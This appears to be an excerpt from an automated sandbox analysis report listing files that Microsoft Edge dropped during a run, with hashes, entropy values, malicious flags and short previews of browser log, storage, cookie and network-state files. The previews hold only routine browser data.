                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):412
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.236978083618923
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:7zEFOvVaYeb8rcHEZrELFUtx1//n5OaYeb8rcHEZrEZSJ:7zEKVaYeb8nZrExgxx5OaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                            MD5:DCDD97362A054350D105F165ACBBBFDE
                                                                                                                                                                                                                                                                                                                            SHA1:5089AD9974CC85E46B2F625A8075B6E0B724BE61
                                                                                                                                                                                                                                                                                                                            SHA-256:79396F48389C261E178ECAE239B0A7A6173F5E36FD0BD89B82D60A3010ADD18C
                                                                                                                                                                                                                                                                                                                            SHA-512:0903ACC9F013090A4C126922440572CC895E4DD6B6F4146E5989259BDDE665A2DD4983D22CB13012E1EF6F2ED1463DF165CA52D9CA97BBD54ABE15EFB326B43F
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:19.737 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/05-02:39:19.738 1de0 Recovering log #3.2025/01/05-02:39:19.738 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):671
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.48545290301778
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:Ci5TlW19YcP94hv14YOzHb6q0OSUElMRE8+RdLMeF33De8E3DJMyieO:Ci5ZW6iXZfrWF3749MyG
                                                                                                                                                                                                                                                                                                                            MD5:4A1DA70D3E47F55078134EDCDF8014CB
                                                                                                                                                                                                                                                                                                                            SHA1:2CCC438DB213A20D068A96FAE990AC0760299F9C
                                                                                                                                                                                                                                                                                                                            SHA-256:C95CD57CFCC8CC76CD77C5CBE0BA5525AC567306443D958B865F425789491E38
                                                                                                                                                                                                                                                                                                                            SHA-512:8A6D7A7866C71B2BF414673370063A5CAF852DB13930AAB759F7676EC19EFDACBA81C200DBE910E1514EEED51B171F4AC104D5F59392147FB6F168B18753F103
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:&.U3.................VERSION.1..META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1736062767822.._https://ntp.msn.com..MUID!.15B6C708283D6E590CC8D263295F6F18.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736062767756.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250103.256"}.#_https://ntp.msn.com..selectedPivot..myFeed.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Sun Jan 05 2025 02:39:30 GMT-0500 (Eastern Standard Time).!_https://ntp.msn.com..storageTest

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.118981274204361
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOH9n2lL+q2PN723oH+Tcwt8a2jMGIFUtt9h11ZmwD916LVkwON723oH+Tcwt8as:7d2IvVaYeb8EFUtvh11/p1e5OaYeb8bJ
                                                                                                                                                                                                                                                                                                                            MD5:21A77E7BFBB1142AECA44BC55C1235FF
                                                                                                                                                                                                                                                                                                                            SHA1:8C12FCC51B6D78A2F81C90C5024E75AF41CE9AA6
                                                                                                                                                                                                                                                                                                                            SHA-256:91F86A14B7EFCC76266F490E9CF216C9493E2CD4EAE28CB119D4855382B80CD2
                                                                                                                                                                                                                                                                                                                            SHA-512:08BF448B96D034F1E44F31247ED1BADF99B36F2024225BEB661EA08C1395FD9A9E02A8ABB22D4FEB640608302EAE2C5E486B278722D6E31A2CEC235EE9FAF5FC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.302 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:39:16.303 1e58 Recovering log #3.2025/01/05-02:39:16.308 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.118981274204361
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOH9n2lL+q2PN723oH+Tcwt8a2jMGIFUtt9h11ZmwD916LVkwON723oH+Tcwt8as:7d2IvVaYeb8EFUtvh11/p1e5OaYeb8bJ
                                                                                                                                                                                                                                                                                                                            MD5:21A77E7BFBB1142AECA44BC55C1235FF
                                                                                                                                                                                                                                                                                                                            SHA1:8C12FCC51B6D78A2F81C90C5024E75AF41CE9AA6
                                                                                                                                                                                                                                                                                                                            SHA-256:91F86A14B7EFCC76266F490E9CF216C9493E2CD4EAE28CB119D4855382B80CD2
                                                                                                                                                                                                                                                                                                                            SHA-512:08BF448B96D034F1E44F31247ED1BADF99B36F2024225BEB661EA08C1395FD9A9E02A8ABB22D4FEB640608302EAE2C5E486B278722D6E31A2CEC235EE9FAF5FC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.302 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:39:16.303 1e58 Recovering log #3.2025/01/05-02:39:16.308 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0e765dba-38cf-4796-9f36-4a4c65aaacdb.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\28c0d00b-864f-4312-b5c2-a02afd5a9003.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5152e32f-15c9-4072-8f8b-acfd55db84d8.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\64a335b6-61b8-4857-9148-f862c684c2fc.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.8731399209529376
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:te+AuOuvX3k5ExBXJydoT9GfDyc1s90Vy5:tT/vX3lb2oWDyc1s90Vu
                                                                                                                                                                                                                                                                                                                            MD5:00B5583E1B2DFC8CDD15202E6D728F1C
                                                                                                                                                                                                                                                                                                                            SHA1:91CA776ACFD6BCEBF6B90364E4BB13F636705E7E
                                                                                                                                                                                                                                                                                                                            SHA-256:B3F96918EE92FBD80A1D0B8C11A4060D2EF30BED67970854120687A26F52579F
                                                                                                                                                                                                                                                                                                                            SHA-512:09960706BD1FAC09ED7FD26E3A8EB9D0E2C575ED2266D8E72EDC9E40BB8315A4EDF4AE02BB49CD744E08FC21C3A49F95952DE83874C1DE275802B3D25934712A
                                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1746
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.3024535722833015
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YcCpfgCzsXtslfcKsgleeIakEsRCgHCYhbj:F2fwGLkeIakFTnh/
                                                                                                                                                                                                                                                                                                                            MD5:00D5DFC8A9239B55338DE66051BFDE64
                                                                                                                                                                                                                                                                                                                            SHA1:75588FE67AFF093FC09D4DC85C77184DDF610923
                                                                                                                                                                                                                                                                                                                            SHA-256:30A13362F5237B45D15D4418848CD6714A68588BF79158C8C5F38790D0E80002
                                                                                                                                                                                                                                                                                                                            SHA-512:5908119D57C7D5C9BA7189283C6156AA0954E9DA1BF3986386FF71BD58934980D2719072E8D0A7E81E05C78DC1827DB46844167584AA78845A3F1601E9C5F833
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383128357765559","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383128360718357","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380629966283589","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.2798474187847966
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBsWd:uIEumQv8m1ccnvS61TYiiP51a
                                                                                                                                                                                                                                                                                                                            MD5:E1A187F95B08E58B8482D90D7ACE701C
                                                                                                                                                                                                                                                                                                                            SHA1:7E55C8743B651AAC8CC19604B1BA9BF5D5B57773
                                                                                                                                                                                                                                                                                                                            SHA-256:CB94BAFB68D988265366D3583155371A1BC4E7B8F147EF629A11860DB2180409
                                                                                                                                                                                                                                                                                                                            SHA-512:5C87EDDF1970AC2129A9CCE10B1C748FB3DCA6616BF2CFCD6397E7CC8177C4BD9077B95FED7FC0FBAB294946F517D9337374108F99B2AE8E46D5C33DF84EAB03
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38483.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3a25b.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3a6a1.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ecf91066-d167-43e4-8ba7-6ff14abc462d.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ef197e1a-cfb5-4102-9806-2a0949c86c90.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):1746
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.3024535722833015
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YcCpfgCzsXtslfcKsgleeIakEsRCgHCYhbj:F2fwGLkeIakFTnh/
                                                                                                                                                                                                                                                                                                                            MD5:00D5DFC8A9239B55338DE66051BFDE64
                                                                                                                                                                                                                                                                                                                            SHA1:75588FE67AFF093FC09D4DC85C77184DDF610923
                                                                                                                                                                                                                                                                                                                            SHA-256:30A13362F5237B45D15D4418848CD6714A68588BF79158C8C5F38790D0E80002
                                                                                                                                                                                                                                                                                                                            SHA-512:5908119D57C7D5C9BA7189283C6156AA0954E9DA1BF3986386FF71BD58934980D2719072E8D0A7E81E05C78DC1827DB46844167584AA78845A3F1601E9C5F833
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383128357765559","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383128360718357","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380629966283589","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

